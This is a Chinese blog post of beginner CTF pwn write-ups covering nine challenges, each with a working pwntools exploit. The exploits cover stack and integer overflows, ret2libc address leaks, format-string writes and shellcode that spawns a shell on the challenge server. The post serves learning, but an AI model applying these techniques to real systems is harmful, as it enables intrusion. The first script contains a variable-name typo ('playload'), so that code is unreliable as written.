Pwn-Exercise area

1.guess_num

用checksec查看文件屬性:

用64位的IDA打開(kāi):

因?yàn)間ets()函數(shù)不受輸入限制可能會(huì)覆寫(xiě)掉棧中的返回地址,造成緩沖區(qū)溢出,因此在這利用gets函數(shù)
進(jìn)入main函數(shù)的??臻g:

可見(jiàn)var_30(也就是v7)占0x30個(gè)字節(jié),并且當(dāng)var_30溢出時(shí)可覆蓋seed。

關(guān)于隨機(jī)數(shù)的產(chǎn)生:http://c.biancheng.net/view/2043.html

在這里我們需要知道,rand()函數(shù)根據(jù)種子即seed產(chǎn)生隨機(jī)數(shù),當(dāng)種子相同時(shí),獲得的隨機(jī)數(shù)也相同。對(duì)于該題目,我們將隨機(jī)種子設(shè)置為0或1都可,參考文件中的循環(huán)來(lái)寫(xiě)腳本。

關(guān)于ldd命令:https://www.cnblogs.com/wanghetao/p/3779611.html

ldd命令用于判斷某個(gè)可執(zhí)行的 binary 檔案含有什么動(dòng)態(tài)函式庫(kù),本題使用方法:
ldd guess_num

關(guān)于ctypes:https://blog.csdn.net/mfq1219/article/details/81945448

ctypes是Python的一個(gè)外部庫(kù),提供和C語(yǔ)言兼容的數(shù)據(jù)類型,可以很方便地調(diào)用DLL中輸出的C接口函數(shù)
加載dll和取出函數(shù):

from ctypes import *   
dll = cdll.LoadLibrary(dllpath)   #dllpath是字符串
exp:
from pwn import *
from ctypes import *

payload = 'a' * 0x20 + p64(1)
io = remote('111.198.29.45',57873)
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
io.recvuntil('Your name:')
io.sendline(playload)
libc.srand(1)
for i in range(10):
    num = str(libc.rand()%6 + 1)
    io.recvuntil('number:')
    io.sendline(num)
io.interactive()

參考:http://www.itdecent.cn/p/0bc6c65addfd

2.int_overflow

用checksec查看文件屬性:

沒(méi)有開(kāi)啟Canary(棧保護(hù)),可以利用棧溢出漏洞
用32位的IDA打開(kāi),F(xiàn)5查看源碼:
進(jìn)入主函數(shù)

通過(guò)代碼,容易分析出程序執(zhí)行過(guò)程,再進(jìn)入login()函數(shù)

可見(jiàn)通過(guò)read()函數(shù)可輸入一個(gè)長(zhǎng)度為0x199的buf(即password),再進(jìn)入check_passwd()函數(shù)

此時(shí)定義了一個(gè)無(wú)符號(hào)的整型v3來(lái)存儲(chǔ)password的長(zhǎng)度,v3為一個(gè)字節(jié),即8bit。但0x199的二進(jìn)制位數(shù)明顯超過(guò)了8位,故在這里可能存在整數(shù)溢出

關(guān)于整數(shù)溢出:整型變量有規(guī)定的有效數(shù)據(jù)長(zhǎng)度,當(dāng)它的數(shù)據(jù)長(zhǎng)度超過(guò)其有效數(shù)據(jù)長(zhǎng)度時(shí),超過(guò)的部分就產(chǎn)生溢出,溢出的部分則直接忽略。

常見(jiàn)各類整型占用字節(jié)數(shù)及取值范圍:

C語(yǔ)言中各個(gè)數(shù)據(jù)類型所能表示的數(shù)都是有一定的取值范圍的,一旦要表示的數(shù)超出了該數(shù)據(jù)類型的取值范圍,就會(huì)從起點(diǎn)開(kāi)始重新計(jì)數(shù)

在本題中,程序規(guī)定輸入的password長(zhǎng)度必須在3~8之間,否者視為無(wú)效輸入。但由整型溢出原理可知,我們輸入的password長(zhǎng)度如果在259~264之間也可通過(guò)if語(yǔ)句,因?yàn)椋?/p>

超過(guò)8位的數(shù)據(jù)將被忽略,即將259賦值給v3時(shí),v3的值為3
通過(guò)if語(yǔ)句之后,會(huì)將password拷貝給dest,進(jìn)入dest的棧空間

dest的大小為0x14,當(dāng)password的大小超過(guò)0x14后皆可覆蓋后面的ebp和返回地址,又發(fā)現(xiàn)Functions Window里一個(gè)特殊的函數(shù)

所以可將strcpy()的返回地址覆蓋為what_is_this()函數(shù)的返回地址,即可得到flag
這里我們password的長(zhǎng)度就選取262(259~264之間任意一個(gè)數(shù)都可以)
dest的長(zhǎng)度為0x14,ebp占4個(gè)字節(jié),what_is_this()函數(shù)的返回地址占四個(gè)字節(jié),故剩余字節(jié)數(shù)為:262-0x14-4-4=234

exp
from pwn import *

elf = ELF('./int_overflow')

io = remote('111.198.29.45',48464)

#io.recvuntil("Your choice:")

#io.sendline("1")

io.sendlineafter("Your choice:","1")

io.sendlineafter("username:","yh")

cat_flag_addr = elf.symbols['what_is_this']

#cat_flag_addr = 0x08048694

payload = 'a' * 0x14 + 'aaaa' + p32(cat_flag_addr) + 234 * 'a'

io.sendlineafter("passwd:",payload)

io.interactive()

參考:
http://www.sohu.com/a/340938352_120054144
https://www.52pojie.cn/thread-1032448-1-1.html

3.when_did_you_born

用checksec查看文件屬性:

開(kāi)啟了Canary,則無(wú)法用覆蓋返回地址的方法了
用64位的IDA打開(kāi)

程序要求我們分別輸入生日和姓名,并且生日不能為1926,但在我們輸入姓名之后,如果生日為1926才會(huì)輸出flag,這就與前面的要求矛盾了
進(jìn)入main()函數(shù)的??臻g看一看

可見(jiàn)我們可以通過(guò)var_20數(shù)據(jù)的溢出來(lái)覆蓋var_18的值,這樣我們輸入名字的時(shí)候就可以重新修改生日為1926,通過(guò)下面的if語(yǔ)句輸出flag了。由??臻g變量的分布可知var_20占8個(gè)字節(jié),超過(guò)這個(gè)長(zhǎng)度即可以覆蓋var_18的值了
并且在名字輸入時(shí),采用的函數(shù)為gets(),可以進(jìn)行溢出

注:gets()不檢查字符串string的大小,必須遇到換行符或文件結(jié)尾才會(huì)結(jié)束輸入,因此容易造成緩存溢出的安全性問(wèn)題,導(dǎo)致程序崩潰,可以使用fgets()代替。
exp:
from pwn import *

io = remote("111.198.29.45",46596)

io.recvuntil("What's Your Birth?")

io.sendline("2000.1.1")

io.recvuntil("What's Your Name?")

payload = 'a' * 8 + p64(1926)

io.sendline(payload)

io.interactive()

4.cgpwn2

用checksec查看文件屬性:

運(yùn)行一下:


使用32位的IDA打開(kāi),F(xiàn)5反匯編結(jié)果如下:

進(jìn)入hello()函數(shù),前面一大段代碼似乎沒(méi)有什么作用,看最后幾句:

gets()函數(shù)可能造成溢出,并且查看到這個(gè)程序有system函數(shù)

則可以利用gets函數(shù)溢出覆蓋修改返回地址為system函數(shù)的地址,但是這個(gè)system還缺參數(shù)"/bin/sh",因此需要我們自己傳入這個(gè)參數(shù)

雙擊這里的name進(jìn)入IDA View-A窗口,可以發(fā)現(xiàn)name是儲(chǔ)存在bbs段中的全局變量,那我就可以將"/bin/sh"寫(xiě)入name中,將name的地址作為system的參數(shù)傳入
進(jìn)入hello函數(shù)??臻g,可發(fā)現(xiàn)s占26個(gè)字節(jié),則還需4個(gè)字節(jié)覆蓋ebp

構(gòu)造的覆蓋數(shù)據(jù)組成為:變量s所占字節(jié)+ebp+system函數(shù)地址+system函數(shù)返回地址+"/bin/sh"參數(shù)地址
exp:

from pwn import * 
io = remote("111.198.29.45",56568)
#io = process("./cgpwn2")
elf = ELF('./cgpwn2')
bin_sh_addr = 0x0804A080
sys_addr = elf.symbols['system']
io.recvuntil("your name")
io.sendline("/bin/sh")
io.recvuntil("here:")
payload = 'a' * (0x26 + 0x4) + p32(sys_addr) + 'a' * 4 + p32(bin_sh_addr)
io.sendline(payload)
io.interactive()

5.hello_pwn

用checksec查看文件屬性并運(yùn)行一下:

再使用64位的IDA打開(kāi),F(xiàn)5反匯編查看偽代碼

進(jìn)入if語(yǔ)句里的函數(shù)看看:

可見(jiàn),只要dword_60106C == 1853186401這個(gè)條件成立,即可得到flag
進(jìn)入IDA View-A 發(fā)現(xiàn)dword_60106C與unk_601068相隔4個(gè)字節(jié),則構(gòu)造這樣的unk_601068:'a'*4+1853186401,即可將dword_60106C覆蓋為1853186401

exp:
from pwn import *
r = remote('111.198.29.45',49875)
playload = 'a'*4 + p64(1853186401)
r.recvuntil("lets get helloworld for bof")
r.sendline(playload)
r.interactive()

6.leve2

用checksec查看文件屬性并運(yùn)行一下:

使用32位的IDA打開(kāi),F(xiàn)5反匯編main函數(shù):

進(jìn)入vnlnerable_function()看看:

再使用Shift+F12查看字符串窗口,也看見(jiàn)"/bin/sh",解題思路如下:
通過(guò)read()函數(shù)讀入數(shù)據(jù),構(gòu)造一個(gè)system("/bin/sh")的偽棧幀,vulnerable_function()執(zhí)行結(jié)束后返回到我們構(gòu)造的偽棧幀去執(zhí)行system("bin/sh"),這樣就可以獲取shell。

exp:
from pwn import *

context.log_level = "debug"

elf = ELF('./level2')

sys_addr = elf.symbols['system'] 

sh_addr = elf.search('/bin/sh').next()

playload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0)+ p32(sh_addr)

io = remote('111.198.29.45',35505)

io.sendline(playload)

io.interactive()

7.leve3

用checksec查看文件屬性并運(yùn)行一下:

用32位的IDA打開(kāi),F(xiàn)5反匯編main()函數(shù)查看偽代碼

進(jìn)入vnlnerable_function()函數(shù)中

存在read()函數(shù),可以進(jìn)行溢出,但是查看函數(shù)窗口和字符串窗口,既無(wú)system函數(shù)也無(wú)/bin/sh字符串


但是存在可以溢出的read函數(shù)與write()函數(shù),可以用來(lái)泄露出system函數(shù)與/bin/sh字符串的地址

關(guān)于write()函數(shù):

因?yàn)閘ibc中的函數(shù)的相對(duì)地址是固定的,并且在知道libc的版本后各個(gè)函數(shù)在其中的相對(duì)位置就可以得到。
則需要泄露出write()函數(shù)的相對(duì)地址再減去write()函數(shù)在libc中的偏移量即可得到libc的基地址,得到了libc的基地址,再加上system()函數(shù)和"/bin/sh"字符串在libc中的偏移量即可得到它們?cè)诘南鄬?duì)位置(在程序中調(diào)用使用的是相對(duì)位置)

關(guān)于GOT表和PLT表:http://www.itdecent.cn/p/f9189b8bf183

exp

1.利用LibcSearcher

#-*-coding:utf-8-*-
from pwn import *
from LibcSearcher import LibcSearcher
import pwnlib

context.terminal = ['gnome-terminal','-x','sh','-c']
sh = remote('111.198.29.45',53647)
elf = ELF('./level3')

write_plt = elf.plt['write'] #獲取plt表中write的地址
write_got = elf.got['write'] #獲取got表中write的地址
vuln = 0x0804844B
print "write_plt = ",hex(write_plt) #分別將plt表中write的地址和vnlnerable()函數(shù)的地址打印出來(lái)
print "vuln = ",hex(vuln)

print "leak write_addr and return to vnlnerable function again"
payload = ''
payload += 140 * 'a' #覆蓋read中的buf和ebp
payload += p32(write_plt) #plt表中write的地址填入read()函數(shù)的返回地址
payload += p32(vuln) #將vnlnerable()函數(shù)的地址作為write()函數(shù)的返回地址
payload += p32(1) + p32(write_got) + p32(4) #作為write函數(shù)的參數(shù),用于泄露write函數(shù)的地址

sh.sendlineafter(':\n',payload)

print "get the related address"
write_addr = u32(sh.recv(4))
print "write_addr = ",hex(write_addr)
libc = LibcSearcher('write',write_addr) #根據(jù)泄露的地址,尋找到對(duì)應(yīng)的libc版本
libcbase = write_addr - libc.dump('write') #用write函數(shù)的相對(duì)地址減去在libc中對(duì)應(yīng)的偏移量得到libc的基地址
system_addr = libcbase + libc.dump('system') #用system函數(shù)在libc中的偏移量加上libc的基地址得到system函數(shù)的地址
binsh_addr = libcbase + libc.dump('str_bin_sh')

print "libcbase = ",hex(libcbase)
print "system_addr = ",hex(system_addr)
print "binsh_addr = ",hex(binsh_addr)

payload = ''
payload += 'a' * 140
payload += p32(system_addr)
payload += p32(0xdeadbeef)
payload += p32(binsh_addr)

sh.sendline(payload)
sh.interactive()

2.直接使用題目給出的libc版本

#-*-coding:utf-8-*-
from pwn import *

sh = remote('111.198.29.45',53647)
elf = ELF('./level3')
libc = ELF('./libc_32.so.6')

write_plt = elf.plt['write']
write_got = elf.got['write']
vuln_addr = elf.symbols['vulnerable_function']

payload = 'a' * 140 + p32(write_plt) + p32(vuln_addr) + p32(1) + p32(write_got) + p32(4)
sh.sendlineafter("Input:\n",payload)

write_got_addr = u32(sh.recv(4))
print 'write_got address is ',hex(write_got_addr)
libc_addr = write_got_addr - libc.symbols['write']
print 'libc_addr is ',hex(libc_addr)
system_addr = libc_addr + libc.symbols['system']
print 'system address is ',hex(system_addr)
binsh_addr = libc_addr + 0x15902B #0x15902b是"/bin/sh"在libc中的地址
# hex(libc.search("/bin/sh").next()) = 0x15902B
print '/bin/sh address is ',hex(binsh_addr)

payload = 'a' * 140 + p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr)
sh.sendline(payload)
sh.interactive()

參考:https://www.52pojie.cn/thread-1032651-1-1.html

8.CGfsb

用checksec查看文件屬性并運(yùn)行一下:

使用32位IDA打開(kāi),點(diǎn)擊main()函數(shù)F5查看偽代碼:

可以發(fā)現(xiàn)如果pwnme=8,則可得到flag,雙擊pwnme,進(jìn)入IDA View-A

發(fā)現(xiàn)pwnme是儲(chǔ)存在bbs段的全局變量,地址為:0804A068。并且該程序沒(méi)有開(kāi)啟PIE保護(hù),則pwnme的地址不會(huì)發(fā)生改變

PIE:全稱是position-independent executable,中文解釋為地址無(wú)關(guān)可執(zhí)行文件,該技術(shù)是一個(gè)針對(duì)代碼段(.text)、數(shù)據(jù)段(.data)、未初始化全局變量段(.bss)等固定地址的一個(gè)防護(hù)技術(shù),如果程序開(kāi)啟了PIE保護(hù)的話,在每次加載程序時(shí)都變換加載地址,從而不能通過(guò)ROPgadget等一些工具來(lái)幫助解題

箭頭處存在字符串格式化漏洞,可以利用這個(gè)來(lái)修改pwnme的值

可以發(fā)現(xiàn)s在棧中的偏移量位10

exp

from pwn import *

sh = remote('111.198.29.45',44004)
pwnme_addr = 0x0804A068
sh.sendlineafter('name:','yh')

payload = p32(pwnme_addr) + 'aaaa%10$n'  #p32(pwnme)占4字節(jié),因此還需要4字節(jié),才能滿足8個(gè)字節(jié)
sh.sendlineafter('please:',payload)
sh.interactive()

幾點(diǎn)補(bǔ)充的知識(shí):
①%x是輸出16進(jìn)制數(shù)據(jù),08表示寬度為8,不足8為左邊按0補(bǔ)齊
②%n:將%n之前printf已經(jīng)打印的字符個(gè)數(shù)賦值給偏移處指針?biāo)赶虻牡刂肺恢?br> ③%K$n:其中的K表示對(duì)第幾個(gè)參數(shù)進(jìn)行相應(yīng)操作

參考:http://winny.work/%e4%b8%80%e7%af%87%e6%96%87%e7%ab%a0%e6%90%9e%e6%87%82%e6%a0%bc%e5%bc%8f%e5%8c%96%e5%ad%97%e7%ac%a6%e4%b8%b2%e6%bc%8f%e6%b4%9e/358.html

9.string

shellcode的生成方法:
https://blog.csdn.net/qq_35495684/article/details/79583232

exp:

#encoding=utf-8
from pwn import *

context(arch = 'amd64', os = 'linux') #指明環(huán)境,為生成shellcode做準(zhǔn)備
p = remote('111.198.29.45',32405)
p.recvuntil('secret[0] is ')
v3_addr=int(p.recv(7),16) #提取v4的地址,并且轉(zhuǎn)化為16進(jìn)制
#v3_addr=int(p.recvuntil('/n')[:-1],16) [:-1]用于去除末尾的/n

p.sendlineafter("What should your character's name be:","asd")
p.sendlineafter("So, where you will go?east or up?:","east")
p.sendlineafter("go into there(1), or leave(0)?:","1")
p.sendlineafter("'Give me an address'",str(v3_addr))

payload = "%85c%7$n" #format的偏移量為8,v2在format前面一位,因此偏移量為7
p.sendlineafter("And, you wish is:",payload)

shellcode = asm(shellcraft.sh())
p.sendlineafter('Wizard: I will help you! USE YOU SPELL',shellcode)
p.interactive()
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 0x01 Start checksec 的時(shí)候可以看到程序沒(méi)有打開(kāi)任何的安全保護(hù)措施,然后查看IDA下的匯編代碼,...
    Nevv閱讀 1,755評(píng)論 0 2
  • 新手練習(xí) CGfsb 簡(jiǎn)單的格式化字符串 get_shell nc 上去直接 cat flag hello_pwn...
    Nevv閱讀 3,335評(píng)論 0 6
  • 歇了很長(zhǎng)一段時(shí)間,終于開(kāi)始了我的攻防世界pwn之路。立一個(gè)flag:每日一題,只能多不能少。 0x00 dice_...
    Adam_0閱讀 7,318評(píng)論 2 7
  • 最近在學(xué)蒸米的《一步一步學(xué)ROP之linux_x86篇》,內(nèi)容寫(xiě)的很詳細(xì),個(gè)人學(xué)到了很多,但同時(shí)學(xué)的過(guò)程中也有很多...
    2mpossible閱讀 1,619評(píng)論 0 5
  • 楔子 我姓何,名水清。是通州何府的大小姐。我的爹爹何文平是通州的知府。娘親在我很小的時(shí)候就去世了,她是個(gè)溫婉的女子...
    扶桑兮若華閱讀 322評(píng)論 0 0

友情鏈接更多精彩內(nèi)容